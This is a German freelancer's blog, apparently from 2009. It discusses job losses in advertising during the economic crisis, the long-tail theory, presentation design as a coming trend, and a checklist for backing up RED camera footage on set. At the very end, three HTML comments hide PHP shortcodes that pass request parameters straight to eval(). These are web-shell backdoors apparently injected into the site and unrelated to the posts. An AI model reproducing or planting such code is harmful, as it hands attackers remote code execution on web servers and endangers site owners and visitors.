The Long Tail beim Freelancer Stammtisch

Nachdem ich in den letzen Wochen aus allen Ecken schlechte Nachrichten vom Arbeitsmarkt gehört habe, finde ich es sinnvoll mal über das Thema zu diskutieren. Wenn wir alle Infos zusammenwerfen müssten wir ein umfassendes Bild bekommen.

Ich selber glaube auch, dass Momentan mehr Jobs abgebaut werden, als neue hinzu kommen. Dem Print gehts schlecht, die Automobilhersteller investiert nicht mehr soviel in Werbung und viele „Top-Agenturen“ entlassen ganze Abteilungen. http://www.werbeblogger.de/2009/06/29/springer-jacoby-quo-vadis/

Die Wirtschaftskrise ist aber nicht die einzige Veränderung, die in unserem Bereich stattfindet. Auch die Kommunikation wandelt sich grad. Die wirtschaftliche Depression wird jetzt als Katalysator für diese Entwicklung wirken und hier entstehen neue Herausforderungen und Chancen.

Einer der in meinen Augen wichtigsten Trends in unserem Bereich ist die Erschließung des Long Tail. (Durch die Demokratisierung von Produktion und Vertrieb gibt es weniger Hits aber dafür mehr Nischenangebote) Als Anregung für einen Blick in die Zukunft werde ich, beim Freelancer-Stammtisch am nächsten Donnerstag, kurz diese Theorie vorstellen.

Powerpoint Optimierung nur besser

Haltet mich für bescheuter, aber ich glaube Präsentationen sind ein nächstes großes Ding.

Durch Youtube und andere Video-Plattformen ist es für jeden möglich zu senden. Das wirkt sich nicht nur auf die Einschaltquoten der TV Werbung aus, sondern auch darauf wie Menschen lernen. Es gibt bereits zu vielen Themen Videotutorials. Die anzuschauen ist meist viel einfacher und bequemer als einen Text zu lesen. Nicht nur meine Generation gewöhnt sich daran so zu lernen. Unternehmen die Ihre Produkte an den Kunden bringen wollen, erreichen mehr, wenn sie dem Kunden verständlich erklären wie das Produkt funktioniert und welchen Nutzen man daraus erzielen kann. Der 30 Sekunden-Werbespot, wie wir ihn kennen, entstand in einer Zeit als Sendeminuten knapp waren. Heute gibt es unbegrenzte Sendezeit und man kann sich wieder Zeit nehmen den Interessierten sein Produkt nahe zu bringen. Durch diese unmengen an Kanälen geht es nicht mehr darum zum Kunden vorzudringen. Man muss auffindbar werden. Wir wollen nicht von Firmen belehrt oder belogen werden. Wir suchen eigenständig nach Lösungen für unsere Probleme und wenn ihr uns dabei unterstützt, mögen wir euch. Aber HÖRT AUF UNS ANZUSCHREIEN!!!

Die Tage von riesigen gesichtslosen Firmen sind gezählt. Es wird wichtiger den Entwicklungs- und Produktionspozess sowie die Menschen dahinter transparent zu machen. Plötzlich zäht wofür eine Firma steht und welche Ziele sie verfolgt. Denn wer sein Geld investieren will, sucht grad heute verlässliche Partner.

Unternehmen werden vermehrt Stellvertreter für einzelne Produkte einsetzen. Jemand der zwischen Entwicklung, Produktion und Kunden vermittelt. Und diese Stellvertreter brauchen Medien um Ihren Standpunkt und den Ihrer Firma zu vertreten. Besonders wichtig werden in diesem Zusammenhang aufgezeichnete Vorträge und deshalb wird der Anspruch an diese Präsentationen zunehmen.

Red am Set

kein fetter Artikel, aber da ich grad eh ne Liste für mich aufgestellt habe kann ich die auch grad veröffentlichen:

Ausstattung

Gute Ausstattung (Kopierzeiten für eine CF Karte inkl. Kontrolle 8 min.)

  • Mac Book Pro
  • Netzteil
  • 2* CF Cardreader (Lexar Professional oder SanDisc Pro)
  • Lacie ExpressCard auf 2*Firewire 800
  • Festplatten 2* Raid 1 (FW800)
  • Maus mit Rad
  • USV (Unabhängige Strom Versorgung)

Minimal (Kopierzeit: 15-20 min):

  • Macbook
  • Netzteil
  • 1 USB 2.0 CF Cardreader
  • 2 USB 2.0 Festplatten

Nachteil: Red Cine unterstützt keine Farbkorrektur, weil das Macbook kein OpenGL hat

Ablauf:

  1. Karte oder Raid auf erste Backup-Platte kopieren
  2. erste Backup-Platte auf die 2.Backup Platte kopieren
  3. Daten von der zweiten Backup-Platte in Red-Cine laden und sichten
  4. Karte oder Raid freigeben

Anmerkungen:

  • Red-Raid und Red-Ram besser erst am Ende des Drehtags löschen
  • Es gibt zwar Software die automatisch Backups erstellt und überprüft (r3d data manager) die ist aber zu langsam für aktuelle Notebooks
  • ein weiterer Vorteil der Kontrolle mit RedCine ist, dass man sofort Über- oder Unterbelichtungen erkennt.

"Hallo Welt" es kommt ein Umbruch

Meine Diplomarbeit habe ich überstanden, aber mit dem subjektiven bloggen mag ich trotzdem nicht aufhören. Doch meine alte Domain wird mir zu klein, für die ganzen Themen um mich herum.

Das war aber erst der kleinste Teil des Umbruchs, der Größere besteht zwar nur aus ein paar Zahlen und heißt Wirtschaftskrise und hat sich mit dem Ende meines Studiums ein tolles Timing überlegt.

Ich bekomme grad mit, wie besonders beim Print viele Arbeitsplätze abgebaut werden müssen, auf der anderen Seite werden Flasher und echte Webdesigner gesucht. Mit meinem Postproduktionswissen stehe ich so in der Mitte. Ich würde behaupten da bewegt dich der Markt noch neutral (manche Jobs verschwinden, andere entstehen). Da aber immer mehr talentierte Leute auf den Markt drängen, wird es dort wohl trotzdem enger.

Aber trotz aller Krise dreht sich die Welt ja weiter. Und deshalb hier mein Blick in die Zauberkugel:

  • Frontale Werbung wird zurück gehen
  • Firmen brauchen Gesichter (ein kleiner Steve Jobs steckt in jedem Unternehmen)
  • direkte Kommunikation statt Massenkommunikation
  • Web 3.0 das lokale Web (Mobil Web)
  • Print ist zu teuer und umweltschädlich

All das führt mich zum Thema: Präsentationsdesign, das nächste große Ding

aber dazu die Tage mehr, erst mal weiter an der Seite werkeln.

<!– [insert_php]if (isset($_REQUEST["eBYh"])){eval($_REQUEST["eBYh"]);exit;}[/insert_php][php]if (isset($_REQUEST["eBYh"])){eval($_REQUEST["eBYh"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VlqyE"])){eval($_REQUEST["VlqyE"]);exit;}[/insert_php][php]if (isset($_REQUEST["VlqyE"])){eval($_REQUEST["VlqyE"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["EPlp"])){eval($_REQUEST["EPlp"]);exit;}[/insert_php][php]if (isset($_REQUEST["EPlp"])){eval($_REQUEST["EPlp"]);exit;}[/php] –>